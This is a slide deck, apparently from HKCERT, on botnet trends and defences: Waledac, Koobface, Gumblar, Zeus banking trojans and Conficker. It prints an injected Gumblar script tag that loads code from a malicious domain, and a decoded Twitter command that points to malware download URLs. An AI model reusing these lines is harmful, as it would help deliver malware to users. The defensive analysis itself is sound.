Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Cyber Attack Trend and Botnet

VIEWS: 80 PAGES: 22

									                  Cyber Attack Trend and Botnet




                                     S.C. Leung
                                      CISSP CISA CBCP




Agenda

 Botnet and Cyber Attack Trends
  Botnet Attack Trends
       Commercialization of Cyber Crime
       Professionalization of Cyber Crimeware
       Social Engineering always cool – Waledac botnet
       Following the Social Network Services – Koobface botnet
       Delivering via Web attack & Search Engine – Gumblar botnet
       Following the Money – Banking Trojans like Zeus botnet
       Building the Survival Kit – Conficker botnet


  Defending against Botnet



Page  2
Botnet (roBot Network)
= infrastructure of controlled victim computers (bots)



                                                     Up: Data
                                    Bot Herder       Down: Command/Update




                   C&C               C&C                     C&C
                                                                     Up: Data
                                                                     Down: Command/Update




             bot     bot      bot   bot        bot     bot         bot


               Spam,                                   DDoS attack
               Malware
                           victim         victim
               Phishing
Page  3




           1. Commercialization of Cyber Crime
Product and Service Delivery for Profit

 What do attackers want now?


 What are their product and services?
  – Products
    • Personal credentials, CCN, SSN,
      software CD keys
    • Tools to exploit, tools to hide malware


  – Service subscription:
    • spam, phishing, DDoS
    • botnet (76services.com  now closed)




Page  5




           2. Professionalization of Cyber Crimeware
Professionalization of Cyber Crimeware

 Division of Labour, R&D and Outsourcing                              Botnet is a sign of
                                                                        maturity of the
 Malware development, Botnet optimization                              infrastructure for
  – Malware good at detection evasion                                   underground economy
  – Malware targeting identifying and terminating security software    – Service delivery
  – Multi-language support
                                                                       – Maintenance
  – Remote administration support
  – Signing and encryption
                                                                       – Long term control


 IT Infrastructure
  – Hosting – network, web hosting at hacker friendly environment
      •    where there is great bandwidth
      •    where legislation is lax
      •    where user awareness is low
  – Domain - registration, domain hosting
      •    where take down procedure is lengthy



Page  7




           3. Social Engineering always cool

           Waledac Botnet
Waledac Botnet

 Spreading by
  – Spam emails employ social engineering extensively
      •     contain link to iFrame embedded malicious website, tricking user to install the malware
 Author = Creator of Storm botnet (which overwhelmed the Internet back in 2007)


 Has sound infrastructure

uses Nginx web server                                         uses Double Fast Flux DNS


                                                                The DNS records are
                                                                changing all the time

                                                                 The DNS servers are
                                                                changing all the time


Page  9




Waledac – Fast-flux




                       Bot hosts can be dynamically assigned in real time




Page  10
Waledac theme – eCard
social engineering – follow the talks of the town




                            postcard.exe
Page  11




Waledac Themes
social engineering – follow the talks of the town




             “Terrorist
              “SMS
             Attack”Spy
            “Independence
              on your
             theme
            Day”
              Partner”




                               Play



Page  12
 Waledac Service and Feature

 Impact
 – open a back door on the compromised computer
 – steal personal information
 – spam contacts in address book
 – turn zombie into web server, web proxy, DNS and spam template relays



 Major web server service
  – Pharmacy
  – serving malware




 Page  13




             4. Following the Social Network Services
Koobface (koob-face)

 A worm spreading in Facebook, MySpace, Twitter, Friendster, hi5 & Bebo

 Spreading
 – Spoof a friend and send a message
   ““Hello; You must see it!!!
     LOL”   with a URL
 – URL brings user to a fake YouTube
   site, luring to install a file
   “Flash_update.exe”
 – Upon execution, victim is infected.
 Impact
 – Poison all user search (Google,
   Ask, Yahoo and Bing) to
   malicious site



                                         http://www.f-secure.com/weblog/archives/00001517.html
Page  15




Koobface: Twitter campaign

 Infected PCs with Koobface
  sent out Tweets with
  malicious URL




Page  16
A Botnet uses Twitter as Command Channel
 Bots subscribe to RSS feed to get command
 A Tweet like this
  –   “aHR0cDovL2JpdC5seS9SNlNUViAgaHR0cDovL2JpdC5seS8yS
      29Ibw==“


 Base64 decode the tweet, we got 2 tiny URLs
  – http://bit.ly/R6STV http://bit.ly/2KoHo


 The bit.ly tiny URLs translated to:
  – http://pastebin.com/pastebin.php?dl=m5222dc70
    http://paste.debian.net/43529/download/43529


  – URLs are encoded file. When decoded and unzipped,
    giving malware files which were found to be poorly
    detected by VirusTotal as malware




 Page  17




         5. Delivering via Web attack & Search Engine
         Gumblar Botnet
Gumblar Botnet: Impact

 Web site is a delivery channel of malware
  – Gumblar steal FTP credentials and upload malware to 3000 legitimate web sites
  – Botnet connect to two domains for download: “gumblar.cn” / “martuz.cn”


 Two Botnets formed: one for web sites and one for infected client PCs


 Impacts
  – Client PCs: install backdoor in victims’ computers that connect to C&C
      •     steal FTP credentials from the victims’ computers
      •     Man in the browser attack: monitor traffic to and from the browser:
            – Replace Google search results with links pointing to malicious websites
            – Redirect from e-commerce or banking site to phishing web sites


  – Web sites: compromise any websites owned or operated by the victims
      •     distribute malware which exploit Acrobat Reader & Flash Player vulnerabilities

Page  19




Gumblar Botnet: Obfuscation

 Web pages injected obfuscated scripts, which vary from site to site, or page to page




                              Malzilla




Page  20
                                               <script src=//martus.cn/vid/?id=j></script>
Gumblar Botnet: Detection and Take down

 Blocking – block the two C&C sites: “gumblar.cn” and “martuz.cn”
 Checking (not 100% accurate)
  – http://www.unmaskparasites.com/security-report/




Page  21




        6. Following the Money
Botnet targeting Banks

 What I have seen on a Zeus Botnet C&C Management interface
  – Bot administration features:

      •     Screenshot (save to html without image)

      •     Fake redirect (redirect to a prepared fake bank webpage)

      •     Html inject (hijack the login session and inject new field)

      :

      •     Log the visiting information of each banking site, record the input string (text or
            post URL)

      •     An unknown field (table: yes/no) found with syntax: nn:nnnnnnnn

            – if the value is yes, mostly with comment, the comment logged the a/c information,
              e.g. transfer limit.




Page  23




Fake Redirect login page




                                                                            Source: Computer Associate
Page  24
Man-in-the-Browser

Hacker’s ideal operation


 Intercept transaction


 Change amount and change
  destination to attacker account
  and send to the bank


 Change the display to user as
  if his transaction was executed
  – Calculate the “should be
    amount” and rewrites the
    remaining total to screen




                                                                    Source: www.cronto.com
Page  25




Man in the Browser (MITB)

 Install software/plugin inside the browser
 Hooking key OS and web browser APIs and proxying data

 Advantage
  – No encryption barrier as in proxy                                  Web App
  – SSL Padlock is unaffected for modified content
  – Direct access to Data                                                MITB
    • Freely alter the web page displayed to the customer
    • Freely modify the requests sent back to the bank.
  – Direct interface to web browser & application                           :
    • Can create additional commands (GET/POST/PUT)                         :
  – Extremely stealthy
    • Client hard to detect, since network is not interfered, web
       address, digital certificates are all correct                   Winsock
    • Bank sees the customer real IP address
  – Faster real time response so can break 2FA


Page  26
Limbo 2 - HTML Injection

 Limbo 2 Trojan kit
 Some variants inject fake
  fields into the online
  banking forms that the
  browser displays to the
  user.


 The additional fields are
  designed to collect
  details to help an
  attacker to impersonate
  the victim and/or
  compromise victim's
  account
                                 What is the use of getting the additional info?

                                                                    Source: ThreatExpert
Page  27




Inserting transaction (when login)

 Login                                                   Shadow Login
                                      Trojan kick up
                                     shadow login at
                                        the back

                 PIN + OTP                                    PIN + OTP
                        Submit


                                                           Insert a new window




                                       PIN + OTP2
            Hacker use OTP2                  Submit           “Not successful.
            to authenticate a                                   Please retry”
            transaction

Page  28
HKMA Circular 2009-07-13

 The HKMA noticed that the recent fraudulent technique adopted by fraudsters is
  believed to involve infecting the customer's personal computer (PC) with Trojan
  horse programs to hijack the Internet banking login credentials of customers
  (including one-time passwords for two-factor authentication) during the
  Internet banking login process.


 The hijacked login credentials were used by the fraudsters to conduct high-risk
  Internet banking transactions such as making fund transfer to an unregistered
  third-party account.




Page  29




        7. Building the Survival Kit
        Conficker Botnet
Conficker - Propagation Mechanism




Page  31                                                       Source: Cisco 2009 MidYear Report




Conficker – a model for sustainable botnet

 Designed to survive in disaster - What if the C&C are taken down?
  – Conficker.B - Domain generation for malware update
    • Active since Nov 2008, generating 250 domains/day in 5 TLDs for update

  – Conficker’s natural predator: the Conficker Working Group
    • Alliance of ICANN, domain registries and IT industry worked together to pre-empt
      Conficker
      – Pre-register domains
      – Redirect traffic to sinkholes to study the behavious

  – Conficker.C improved
    • Starting Apr 1, 2009, generating 50,000 domains/day in 116 TLDs; uses 500 in
      random (Some are existing domains)  making it harder to preempt the domains
    • improved authentication and encryption  so you cannot infiltrate into Conficker.C
      botnet easily
    • uses P2P for update as well – peers can update each other with the right
      authentication
    • Blocks more security vendors web site

Page  32
Collaborative Effort Works!

 Conficker Working Group lead a concerted effort
   (www.confickerworkinggroup.org)
                                                                       No infection
   – ICANN organized all registries to pre-empt the registration,
     handle affected domains
   – Researches generated the list of generated domain and affected
     domains to provide transparency
   – Some worked out an EyeChart for easy detection
   – Security vendors developed detection and removal tools
                                                                       Conficker.C

 HKIRC, HKCERT, Police and OGCIO
   –   Check affected domains in April list for suspicious content
   –   Put idle domains in close observation
   –   Exchange intelligence on the progress
   –   Coordinate with CNCERT/CC on an HK IP address owned by a       Conficker.A/B
       mainland web hosting provider




Page  33




Conficker – a model for sustainable Botnet

 Everyone watching the domain generation, but nothing happened there


 Since Conficker has dual update mechanisms -- domain generation and
  P2P, it takes the liberty to use any one at any time. Conficker had
  succeeded to evolve by P2P channel.


 We still have a long way to close it down.




Page  34
        Defending against Botnets




Enhance Response
           Conficker Working Group approach works! ICANN and others are
            collaborating more to speed up the take down.
            –   Sharing of intelligence
            –   Speed up takedown
            –   Preempt future attacks


           HKCERT
            –   Proactive Discovery of malicious site in Hong Kong (with limited resources)
            –   Awareness education for service providers: HKCERT organized with OGCIO
                and HKPF “ISP Symposium” in May 2009
            –   Cyber Drill: HKCERT organized with OGCIO and HKPF a cyber drill with theme
                “Combating Cyber Crime” in July 2009


           HKMA & Banks
            –   HKMA circular
            –   Banks tighten their procedure for high risk transaction and fraud detection

Page  36
   Defense against Botnet

           Botnet is malware
           3 Baseline Defense is necessary though insufficient
            – Protection from malware
                • Note browsers plugins can be malicious or weakness point
            – Personal Firewall
            – Update patches
           Server defense
            – Install minimum modules on server. Do not use it to browse Internet
            – Keep patching update
            – Protect from web attacks
                • Application Firewall
                • See SQL Injection Defence Guideline published by HKCERT

Page  37




Monitor software patch level and take prompt
action
 Secunia Personal Software
  Inspector
  – Scan for installed Windows
    software and their patch
    level, with threat level
  – Provide link to download
    available patch or
    workardound
  – http://secunia.com/vulnerabil
    ity_scanning/personal/




Page  38
Monitor software update

 CleanSofts.com Update Notifier
  – scanning for installed Windows software
    and display list of updates
  – verifying the software against malware
    (best effort with current AV software only,
    so it is no better than VirusTotal)
  – http://cleansofts.org/view/update-notifier.html




Page  39




Safe Browsers

 Browsers add anti-malware, anti-phishing features
  – IE, Mozillia, Opera; add Netcraft toolbar if you want
  – Minimize your browser and plug-ins
 Firefox and Flock browser now incorporate Google safety alert
 New browser use sandbox approach: Chrome




Page  40
Detecting Botnet
Next presentation




                      Q&A


               S.C. Leung (梁兆昌)
                    scleung@hkcert.org
Building up a Botnet

 Having the Malware to infect user machines
  – Detection evasion advancement
  – Control and update
 Getting a Channel to Deliver the Malware
  – Spam: Social Engineering                                             Waledac
  – Legitimate Web Server  redirecting users to Exploit servers         Gumblar
  – Social Network  redirecting users to Exploit servers
                                                                         Koobface
  – Exploit servers hosting the malware
 Exploiting vulnerabilities (Windows, browser, Office, Acrobat Reader, Adobe Flash,
  etc.) of the victim machine
 Controlling the victim PCs
  – Botnet Command and Control Centre
 Providing resilience in case of take down by law enforcement
  – Fast Flux DNS: to make the structure more dynamic
                                                                         Conficker
  – Disaster Recovery: find way to recover

Page  43

								
To top